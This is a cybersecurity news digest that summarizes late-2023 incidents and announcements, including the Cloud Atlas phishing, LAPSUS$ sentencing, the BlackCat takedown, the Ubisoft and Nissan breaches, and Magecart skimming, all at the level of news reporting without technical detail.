Daily Brief

Cloud Atlas, an enigmatic cyber espionage group, has launched spear-phishing attacks on Russian agricultural and research companies. The cybersecurity company F.A.C.C.T. identified the attacks, noting that Cloud Atlas has been active since at least 2014, targeting multiple countries including Russia. The threat actor utilizes a known Microsoft Office vulnerability (CVE-2017-11882) in its attack chain, starting with phishing emails containing malicious documents. Recent attacks feature a multi-stage sequence, deploying a PowerShell-based backdoor and DLL payloads that communicate with a controlled server. Cloud Atlas avoids detection by employing legitimate cloud storage services and software features, coupled with the use of unique payload requests and validation techniques. The group's methodology includes the exploitation of outdated vulnerabilities and reliance on sophisticated tactics to hide their malware and avoid detection tools. Attacks from this group continue to be an issue, displaying both persistence in their campaigns and a selective approach to their malware and attack vectors.

Google Chrome's Safety Check feature will now continuously run in the background, checking for compromised passwords. The browser will alert users to harmful extensions, prompt updates to the latest Chrome version, and verify that Safe Browsing is active. Automatic revocation of permissions for unused websites will be introduced to enhance user privacy. Safety Check will begin to flag sites that bombard users with notifications and offer quick options to disable them. Since its 2020 debut, Safety Check has been protecting users by comparing credentials against data from breaches and identifying weak passwords. New functionality will enable desktop users to save tab groups and continue their sessions on other devices, improving multitasking and workflow continuity. Chrome's performance is being optimized with detailed insights into memory usage, including a focus on tabs that can be rendered inactive to save resources. Google continues securing web browsing by defaulting all HTTP requests to HTTPS and expanding real-time phishing protection with an updated list of malicious URLs.

Two British teenagers associated with the cybercrime group LAPSUS$ have received sentences for their involvement in numerous high-profile cyber attacks. Arion Kurtaj, who is autistic and deemed unfit for trial, received an indefinite hospital order due to his expressed intent to return to cybercrime. A 17-year-old accomplice, whose identity remains confidential due to his age, was sentenced to a Youth Rehabilitation Order with intensive supervision. Both individuals were part of an attack campaign targeting major corporate entities including Microsoft, NVIDIA, and Uber, and were arrested and re-arrested throughout 2022. Arion Kurtaj breached bail conditions by continuing cyber attacks until his subsequent arrest, illustrating the challenge of deterring determined cybercriminals. The actions of LAPSUS$ were documented in a report by the U.S. Department of Homeland Security, highlighting their use of SIM-swapping and public extortion tactics. The rise of LAPSUS$ has also led to the creation of similar groups, indicating a growing trend in youth-led cybercriminal organizations. Law enforcement underscored the risks and serious legal repercussions for young people engaging in cybercrime, emphasizing the importance of guiding tech-savvy youth towards positive pursuits.

'Wall of Flippers', a new Python project, can detect Bluetooth spam attacks by devices like Flipper Zero and Android smartphones. Security researcher 'Techryptic' showed in September 2023 that Flipper Zero could spam bogus Bluetooth connection notifications to Apple devices. Simon Dankelmann developed an equivalent Android app, broadening the attack's reach to Android and Windows devices, with potential disruptions to medical devices and payment readers experienced at Midwest FurFest 2023. These spam attacks might degrade the quality of life or present serious health risks for individuals using Bluetooth-connected medical equipment. While Apple introduced mitigations in iOS 17.2 against this type of BLE spam, similar protections are not yet confirmed for Android. The Wall of Flippers script passively captures the MAC address, signal strength, and packet data of potential attackers, helping users identify and respond to Bluetooth spam threats. The Wall of Flippers project is ongoing and available for Linux and Windows, with updates expected to enhance detection capabilities.

Iranian APT group Peach Sandstorm targeted U.S. defense orgs with a custom backdoor malware dubbed FalseFont, which gives remote access and exfiltration capabilities. Microsoft's threat intelligence identified the cyberespionage attempts, observing password spraying and use of custom tools for lateral movement. The group, also tracked as APT33 by Mandiant, has interests in commercial/military aviation and energy sectors, primarily in the U.S., Saudi Arabia, and South Korea. A international law enforcement operation, involving 17 countries, cracked down on credit card theft from e-commerce sites, identifying 443 compromised shops. Group-IB and Sansec, cybersecurity firms, participated in the operation against JavaScript-sniffers, uncovering 23 families of JS-sniffers affecting global e-commerce platforms. Critical vulnerabilities in various products, including a Chrome heap buffer overflow and a session rendering issue in macOS Sonoma, call for immediate patching. Russian infosec employee Nikita Kislitsin, wanted by the U.S. for cybercrimes, will be extradited from Kazakhstan to Russia, where he faces hacking charges.

Mint Mobile, an MVNO owned by T-Mobile, has experienced a security breach exposing customer personal information. Customers were notified of the incident on December 22, which may enable SIM swapping attacks using the exposed data. The breach revealed information such as names, addresses, emails, and phone numbers; however, credit card numbers were not stored and thus not compromised. Mint assured that strong cryptographic technology protects passwords, although it's unclear if hashed passwords were accessed. The company has resolved the breach and is working with cybersecurity experts to strengthen security. No customer action is deemed necessary, but a dedicated customer support number has been provided for related inquiries. Mint Mobile suffered a previous breach in 2021, and its parent company T-Mobile has faced multiple data breaches, including a significant one in January 2023. BleepingComputer reached out to Mint regarding the specifics of the breach and the status of hashed passwords but has not yet received a response.

The FBI successfully hacked the BlackCat/ALPHV ransomware operation, a group with over $300 million in ransom demands from more than 1,000 victims. During the operation, the FBI secured decryption and Tor private keys, allowing them to help 400 victims decrypt their data free of charge. Law enforcement has been battling the ransomware gang for control of their Tor URLs due to possession of the same private keys. The disruption caused by the FBI's action has led to a loss of trust among BlackCat's affiliates, pushing them to seek new methods of contact with victims or join other gangs. Despite setbacks, there are talks of a possible "cartel" formation between BlackCat and LockBit to unite against law enforcement efforts. Other notable cyber incidents mentioned include significant data breaches at Mr. Cooper affecting 14.7 million people and ESO Solutions impacting 2.7 million patients, while several ransomware attacks have occurred across various organizations.

Ubisoft is examining a possible security breach after internal software and developer tools images surfaced online. The company, known for acclaimed games like Assassin's Creed and FarCry, confirmed the investigation to BleepingComputer. Screenshots shared by VX-Underground suggest unauthorized access to Ubisoft's internal services. An unknown threat actor alleges to have breached Ubisoft's network, aiming to exfiltrate approximately 900GB of data. The accessed systems reportedly include Ubisoft's SharePoint server, Microsoft Teams, Confluence, and MongoDB Atlas panel. The actor claimed they tried to steal Rainbow 6 Siege user data but were thwarted before achieving their goal. MongoDB Atlas had a recent breach, which seems unrelated to this incident. Past breaches at Ubisoft include a 2020 ransomware attack and another disruption in 2022 affecting games and services.

Ubisoft is investigating a potential security breach following online leaks of internal software images and developer tools. Leaked screenshots seem to show access to internal services such as Ubisoft's SharePoint server, Microsoft Teams, and Confluence. An unknown threat actor claimed to vx-underground that they infiltrated Ubisoft's systems on December 20th with intentions to exfiltrate about 900GB of data. The same threat actor alleged efforts to steal Rainbow 6 Siege user data, but their access was cut off before successful exfiltration. Ubisoft has experienced previous breaches, such as the Egregor ransomware attack in 2020, which led to leaked source code, and another incident in 2022 that disrupted its operations. There is currently no evidence linking this alleged breach to the recent MongoDB Atlas breach, despite similar timing.

A fraudulent WordPress plugin is injecting malicious JavaScript to steal credit card data from e-commerce sites. Security firm Sucuri reports that this plugin fraudulently creates admin users and skims credit card information during the checkout process. The plugin hides itself in the WordPress 'must-use plugins' directory and disables functions to evade removal. It is part of a wider Magecart campaign, which uses skimming techniques to target online storefronts and exfiltrate data to a controlled domain. Recent WordPress phishing campaigns mimic security alerts to trick users into installing malicious plugins, leading to unauthorized admin access. Europol has highlighted digital skimming as an ongoing threat, with 443 online merchants notified about compromised customer payment data. Group-IB reveals 132 JS-sniffer malware families being used to compromise websites globally. Scammers are using Google Search and Twitter ads to promote a cryptocurrency drainer, resulting in significant financial loss to victims.

The Akira ransomware gang has claimed to have breached Nissan Australia, stealing approximately 100GB of data. Sensitive business and client information, including employee personal details, NDAs, and project files, are threatened to be leaked. After failed ransom negotiations, Akira ransomware group has announced intentions to publish the stolen data. Akira ransomware has been active since March 2023 and targets various sectors, including those using VMware ESXi servers for encryption. Lately, ransom demands range from $200,000 to millions, correlating with the size of the victimized organization. Nissan Australia is working to restore affected systems and assess the full impact of the breach, with an ongoing investigation. The company has notified relevant cyber security, privacy, and law enforcement agencies regarding the breach and advised customers to watch for suspicious activity. Nissan's response is underway, even as they maintain open lines of communication with their dealerships and customers.

Cybersecurity defenders were briefly enthused when the AlphV/BlackCat ransomware group's website went offline, though it was soon restored. Singapore-based Group-IB has successfully infiltrated several high-profile ransomware groups, gathering insider intelligence on their operations. Their multi-step approach involves thorough research into the targeted ransomware-as-a-service (RaaS) group, understanding terms and conditions, and establishing communication with ransomware managers. The crux of infiltration lies in passing a rigorous interview process, where researchers must convincingly assume the role of potential affiliates, showcasing technical knowledge and avoiding linguistic slips. Upon successfully gaining access, Group-IB gathers valuable data on the groups' internal workings, such as attack numbers, ransom payments, and affiliate payment structures, to support future mitigation and response efforts. Such operations are conducted within legal boundaries, aiming not to engage in any illegal activities, but to collect information to assist victims and understand threat actors better. The value of these undercover operations lies not only in the potential to aid victims and investigations but also in enhancing preventative measures against ransomware threats.

Europol alerted 443 online merchants about injections of malicious skimming scripts on their websites. The JavaScript skimmers intercept customers' payment data during purchases, risking unauthorized transactions and data sale on the dark web. The two-month international effort, led by Greece and supported by law enforcement from 17 countries, identified the compromised online shops. Analysis revealed 23 varieties of JavaScript sniffers that evade detection through techniques like mimicking legitimate web services. Group-IB and Sansec, along with national CSIRTs, collaborated with Europol during the investigation. Europol recommends merchants review their digital skimming defense guide, especially ahead of high online shopping seasons. Customers are advised to use one-time payment methods and monitor their statements for signs of card compromise.

Over 1.5 million users unknowingly installed malicious Chrome extensions disguised as VPN services. The extensions were distributed through installer files hidden in pirated video game torrents. Google has since removed the harmful extensions from the Chrome Web Store upon notification. The primary victims were in Russia and nearby countries, with extensions automatically installed without user interaction. The malware targeted other cashback and coupon extensions to monopolize profits from the infected devices. ReasonLabs revealed the extensions had extensive permissions, enabling data theft and browser manipulation. Command and control server communication was part of the extensions' operation, suggesting organized cybercrime involvement. The incident underscores the need for users to vigilantly review and manage their browser extensions to prevent malware infections.

Indian government and defense sectors faced a phishing onslaught aimed at implanting Rust-based malware for intelligence collection, dubbed Operation RusticWeb. The SEQRITE security firm identified the campaign, observing the use of novel Rust payloads and PowerShell commands for stealthy document exfiltration. Similarities found between Operation RusticWeb and two Pakistan-associated groups, Transparent Tribe and SideCopy, indicate a potential nation-state actor behind the attacks. Recent attacks utilized decoy Microsoft PowerPoint files and exploited vulnerabilities (CVE-2023-38831) for broad system control and remote access. The phishing approach starts with a malicious PDF, which initiates the Rust payload that secretly scans the system while showing the decoy document. The malware focuses on collecting system information and files, yet lacks complexity compared to other cybercriminal tools. A secondary SEQRITE-discovered attack chain uses PowerShell for data gathering and a Rust executable masquerading as a legitimate application for payload deployment. Continued aggressive cyberattacks by nation-state actors like the DoNot Team exemplify persistent threats in geopolitically sensitive regions such as Kashmir.